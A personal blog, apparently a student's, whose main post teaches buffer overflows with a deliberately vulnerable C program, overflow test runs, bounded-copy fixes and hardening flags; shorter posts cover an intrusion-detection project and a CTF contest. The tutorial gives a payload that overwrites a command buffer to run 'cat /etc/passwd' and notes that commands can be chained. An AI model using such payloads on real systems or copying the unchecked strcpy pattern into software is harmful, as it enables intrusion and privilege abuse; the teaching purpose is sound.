Buffer Overflow: Part 2

It has been a very long time since I wrote something for the blog, especially since in the last post I mentioned that I would come back with a second part for it. Coming straight to the point, here it is. 🙂
Just a recap of what we talked about before on buffer overflow attacks: any attack that exploits the fact that copying a string into a buffer is not checked against the buffer's size (a string length limit) falls into the buffer overflow category.
First we will look at a simple demonstration of a buffer overflow attack. For this we need a vulnerable program. Without loss of generality we can use the program below for the demonstration and for further study if required, because as the program grows, only the difficulty of finding the exact overflow limit increases; almost everything else stays the same.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char cmd[10];
    char buf[500];

    if (argc < 2) {                 /* usage check; without it a missing argument crashes strcpy */
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }

    strcpy(buf, argv[1]);           /* deliberately unbounded copy: input longer than buf spills into cmd */
    printf("\n%s   [[[[[%s]]]]]]\n", buf, cmd);
    system(cmd);                    /* cmd is never initialized; whatever it holds is executed */

    return 0;
}

What this program does:
It simply copies the first command line argument into the character array buf of size 500. Later, the command stored in the variable cmd is executed using the built-in function system.

Vulnerability:
* The length of the command line argument is not compared (checked) against the size of the destination variable, buf. The part of the input that overflows the buf array is written over the cmd variable, which in turn gets executed automatically through the system function.
* If the final executable is a set-uid program, the running process automatically inherits the permissions of the file's owner. If the owner is root, the attacker gets superuser power.

What can be done:
Use strncpy instead of strcpy. strncpy lets us specify the maximum number of bytes to copy into the destination, whereas strcpy copies until it finds the terminating NUL, however long the source is. One caveat: if the source is at least as long as the limit, strncpy does not write a terminating NUL, so the destination must be terminated explicitly. (Refer to the man pages for strcpy and strncpy.)
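As an added example (not code from the original post), here is how the strcpy(buf, argv[1]) call above can be replaced with a bounded copy that refuses over-long input instead of letting it spill into cmd, together with the strncpy-then-terminate idiom the caveat describes. The function names copy_bounded, strncpy_terminated and handle_input, the harmless fixed command "true" and the 499/500/513-byte test inputs are my own constructions, not the author's.

```c
/* Added example: bounded replacements for the unchecked strcpy in the
 * vulnerable program above.  All names here are assumptions of this
 * example, not part of the original post. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Copy src into dst, which holds dstsize bytes.  Returns 0 on success and
 * -1 if src plus its terminating NUL does not fit; on failure dst is left
 * empty rather than truncated, so a caller never acts on a half-copied
 * command line. */
static int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dstsize) {              /* no room left for the NUL terminator */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);         /* n + 1 copies the terminator too */
    return 0;
}

/* strncpy does NOT terminate dst when src has dstsize or more bytes, so the
 * idiom is: strncpy, then force the last byte to NUL.  Returns 1 if the
 * result was truncated, 0 otherwise. */
static int strncpy_terminated(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return 1;
    strncpy(dst, src, dstsize);      /* pads with NUL only if src is short enough */
    if (dst[dstsize - 1] != '\0') {
        dst[dstsize - 1] = '\0';
        return 1;                    /* truncated: src did not fit */
    }
    return 0;
}

/* Mirrors the original layout (cmd declared next to buf) but with the
 * checked copy.  Returns 0 when the input was accepted, -1 when it was
 * refused; cmd is copied out so a caller can confirm it was never touched.
 * "true" is a constructed, harmless command standing in for the real one. */
static int handle_input(const char *input, char *cmd_out, size_t cmd_out_size)
{
    char cmd[10] = "true";
    char buf[500];
    int rc = copy_bounded(buf, sizeof buf, input);
    strncpy_terminated(cmd_out, cmd_out_size, cmd);
    return rc;
}

int main(void)
{
    /* Constructed inputs: 499 fits, 500 leaves no room for the NUL, 513 is
     * the length at which the original program started executing input. */
    char cmd[10];
    char filler[600];
    size_t lens[] = { 499, 500, 513 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        memset(filler, 'A', lens[i]);
        filler[lens[i]] = '\0';
        int rc = handle_input(filler, cmd, sizeof cmd);
        printf("input of %zu bytes: %s, cmd is still \"%s\"\n",
               lens[i], rc == 0 ? "accepted" : "refused", cmd);
    }
    return 0;
}
```

Note that the length check happens before any byte is written, so the 500- and 513-byte inputs are rejected outright and cmd keeps its value. Building with `gcc -Wall -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2` adds a second line of defence: the stack protector aborts the process if a canary between the arrays is overwritten, and with _FORTIFY_SOURCE glibc swaps strcpy for a checked variant wherever the destination size is known at compile time.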

Below are the input and output for various input lengths (runs of the string AAAA…AAA of different lengths; the python2.7 command is run through shell command substitution so that its output becomes the program's argument):

BufferOverFlow||22:41$ ./simple $(python2.7 -c 'print "A" * 510')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[p�k�]]]]]]
sh: $'p\205k\206\377\177': command not found

BufferOverFlow||22:42$ ./simple $(python2.7 -c 'print "A" * 511')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[@�y$]]]]]]
sh: @�y$: command not found

BufferOverFlow||22:41$ ./simple $(python2.7 -c 'print "A" * 512')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[]]]]]]

BufferOverFlow||22:42$ ./simple $(python2.7 -c 'print "A" * 513')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[A]]]]]]
sh: A: command not found

BufferOverFlow||22:41$ ./simple $(python2.7 -c 'print "A" * 515')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[AAA]]]]]]
sh: AAA: command not found

This shows us that (for the above program) once the input is 513 characters or longer (remember that buf holds 500 characters), the second variable, cmd, starts to get overwritten by the excess, i.e. the overflowed characters from the input. The 12 bytes between the end of buf and the start of cmd come from how the compiler laid out and aligned the stack variables; that offset is specific to this build, which is why the limit has to be found experimentally for each binary. Therefore a conclusion can be made that if the input string is formatted so that a valid bash command is appended after 512 filler characters, that command will get executed, i.e. python2.7 -c 'print "A" * 512 + "<required command>"'

If the input was python2.7 -c 'print "A" * 512 + "cat /etc/passwd"', the attacker would be able to read the passwd file on the vulnerable machine.

NOTE: If a space is to be used outside double or single quotes while giving input to the above program, remember to escape it with a backslash.

This attack can be extended easily:
The statement terminator in bash is a semicolon. So, by ending each statement with a semicolon, a small script can be supplied as the input, which could prove to be more dangerous.

IMPORTANT:
"Do not use system() from a program with set-user-ID or set-group-ID privileges, because strange values for some environment variables might be used to subvert system integrity. Use the exec(3) family of functions instead, but not execlp(3) or execvp(3). system() will not, in fact, work properly from programs with set-user-ID or set-group-ID privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup. (Debian uses a modified bash which does not do this when invoked as sh.)" – Linux MAN Pages (SYSTEM(3))

"If the destination string of a strcpy() is not large enough, then anything might happen. Overflowing fixed-length string buffers is a favorite cracker technique for taking complete control of the machine. Any time a program reads or copies data into a buffer, the program first needs to check that there's enough space. This may be unnecessary if you can show that overflow is impossible, but be careful: programs can get changed over time, in ways that may make the impossible possible." – Linux MAN Pages (STRCPY(3))

Most programs written in C have some part that uses a strcpy call. A BOF attack can be designed to exploit this vulnerable function. In the next part we will remove the system call and instead inject the code through the input (in place of the command for system), so that it gets executed on the stack.

New link can be found at abijith-kp.github.io


major project starts

Here starts the next major step in my academic life: the Major Project. I like to see this work as very important, but I have also seen people who don't even want to do this. They just want to get into some group and just survive there by utilizing the energy of their teammates.

As always when I start off a project I have a lot of expectations about it: completing it, then developing it, putting it in the public domain and allowing others to improve the work. But most of these don't work out… :D. But this time I really want to make a change to it. And I will.
This time I am going with a project on an Intrusion Detection System. We are planning to build it on top of the STAT framework. There would be a need to implement a compiler for the STAT Language* also. We actually have no materials other than a few (old) papers relating to it. But we took this project only because we felt it would be very interesting to model an attack on the basis of a new framework. Initially, after making a compiler for a subset of the language, we would like to give a Proof of Concept for a few attack signatures. Then we would be able to assert that this compiler could be extended to detect many more different attack patterns.

In the first phase we have to identify which attacks we are modeling, decide on the method to implement the compiler for STATL, and decide on the subset of STATL that would help us represent the identified attack sequences.

I will update this post as it goes.

EDIT: Continuation of this post is added here.

*Similar existing language would be Snort.

Hacking at InCTF-Part1

Usually I just skim through my NITC mail, and check only those sent by my Class Representative or teachers. One day I read a mail forwarded by one of my seniors, Karthik. It was about a hacking competition conducted by Amrutha University called InCTF, which had 2 preliminary rounds and a final round. It was a Capture The Flag kind of competition. At that time I wasn't in the mood to do anything as I had to complete my lab assignments (with which I was in a bad situation), and also, if by any chance I got selected, the second round would be at the time of our exams, so I ignored it. Later, when I was searching for something, I again came across this competition. This was the first time that this kind of event came to my notice (it was a pretty interesting one… one that I knew I would surely enjoy.. 🙂 ). Then I called one of my friends to tell him about this. I couldn't make any decision then as I wanted to put my leg on both boats – do it and not do it. He was very excited to do the event. So we decided to meet one of our seniors, Jerin Shaji, to get the details of the event.

Oh… I forgot to tell, last year (2012) at sCTF, a variant of InCTF, the first prize was bagged by our college team consisting of Karthik, Jerin and Nithin.

Jerin told us many things: how they prepared, how they participated in the event, and about the event format. He also gave us tips on how to attack the questions and told us the techniques they used in the final CTF round. We collected their last year's question paper also. He was very supportive in all ways.

To date two rounds of InCTF have been completed. The first round was a "learning round". They gave us something like 2-3 months to learn a few concepts and complete a question paper. The second round was a hands-on hacking round. It had different varieties of questions, most of which were of very high quality. Thanks to the support of all my friends our team "dcoder" got selected into the final round. We finished at 24th position out of the 158 teams registered at the end of the second round.

It was a really great experience participating in the event. The main thing I have to mention is that I learned a few methods and techniques during this event. We also had to stay overnight in our lab during the second round; those were great times. Those are the points in your life where you start thinking philosophically and talk like a philosopher. The main reason is that at some point we were half asleep and wanted to answer all the questions asked to us. These will be a few moments that I will keep forever in my memories.

The more interesting part was that the second round overlapped with our exam time. So we had to do it in between the exams. For my last exam I couldn't even prepare much because I was very much involved in this. After I came back to my room I had a mild fever also. Everything that happened was indicating that I shouldn't write my exams well (omen kind of, just saying – I don't believe in those).

Just excited in participating in the final round… 🙂
